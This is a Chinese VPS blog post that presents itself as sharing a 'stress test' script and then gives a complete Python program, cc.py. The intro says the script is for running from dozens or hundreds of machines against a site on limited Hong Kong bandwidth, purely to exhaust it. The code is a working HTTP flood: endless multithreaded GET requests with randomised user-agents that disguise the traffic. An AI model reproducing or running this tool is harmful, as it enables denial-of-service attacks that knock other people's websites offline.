分享下单机压力测试脚本

搬瓦工机场JMS

这个脚本适用条件很有限,比如自己手里有几十几百台机器,而目标站又用的香港这种小水管,纯粹消耗带宽用。

参数
python cc.py -t 线程数 -u  http://www.xxx.com/

  1. #!/usr/bin/env python
  2. #!coding:utf8
  3. import pycurl
  4. import StringIO
  5. import Queue
  6. from threading import Thread
  7. from threading import Lock
  8. from os import system
  9. import time
  10. import re
  11. import sys
  12. from random import randint
  13. import random
  14. import urllib
  15. import getopt
  16. from optparse import OptionParser
  17. TIMEOUT = 30
  18. parser = OptionParser()  
  19. parser.add_option("-t", "–thread", dest="thread_num", action="store",
  20.                       help="thread")
  21. parser.add_option("-u", "–url", dest="url", action="store",
  22.                       help="url")
  23. (options, args) = parser.parse_args()  
  24. thread_num = int(options.thread_num)
  25. def get_url():
  26.     pices = options.url.split(‘ ‘)
  27.     return random.choice(pices)
  28. def http_get(url):
  29.     try:
  30.         buf = StringIO.StringIO()
  31.         c = pycurl.Curl()
  32.         c.setopt(c.NOSIGNAL, 1)
  33.         c.setopt(c.URL, url)
  34.         c.setopt(c.WRITEFUNCTION, buf.write)
  35.         c.setopt(c.USERAGENT, rand_ua())
  36.         c.setopt(c.CONNECTTIMEOUT, TIMEOUT)
  37.         c.setopt(c.TIMEOUT, TIMEOUT)
  38.         c.setopt(c.SSL_VERIFYPEER, 0)  
  39.         c.setopt(c.SSL_VERIFYHOST, 0)
  40.         c.setopt(c.FOLLOWLOCATION, 0)
  41.         c.perform()
  42.         rescode = 0
  43.         res = buf.getvalue()
  44.     except Exception,e:
  45.         rescode = 1
  46.         res = e
  47.     finally:
  48.         buf.close()
  49.         c.close()
  50.     return (rescode, res)
  51. def cc():
  52.     while(True):
  53.         target_url = get_url()
  54.         res = http_get(target_url)
  55.         timestr = time.strftime(‘%Y-%m-%d %H:%M:%S’, time.localtime(time.time()))
  56.         if res[0] == 0:
  57.             print "[%s] \33[33m%s\33[0m \33[32m%s\33[0m" % (timestr, target_url, len(res[1]))
  58.             pass
  59.         else:
  60.             print "[%s] \33[33m%s\33[0m [%s]%s" % (timestr, target_url, res[0], res[1])
  61.         del res
  62. def main():
  63.     threads = []
  64.     for i in range(thread_num):
  65.         threads.append(Thread(target=cc))
  66.     print ‘threads start…’
  67.     time.sleep(1)
  68.     for t in threads:
  69.         t.start()
  70.     for t in threads:
  71.         t.join()
  72. def rand_ua():
  73.     return "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/%s.%s (KHTML, like Gecko) Chrome/%s.0.%s.%s Safari/%s.%s"\
  74.         % (randint(50,600),randint(20,60),randint(30,80),randint(200,8000),randint(1,99),randint(1,1000),randint(1,99))
  75. if __name__ == ‘__main__’:
  76.     main()

复制代码

未经允许不得转载:美国VPS_搬瓦工CN2 GIA VPS » 分享下单机压力测试脚本

赞 (0) 打赏

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏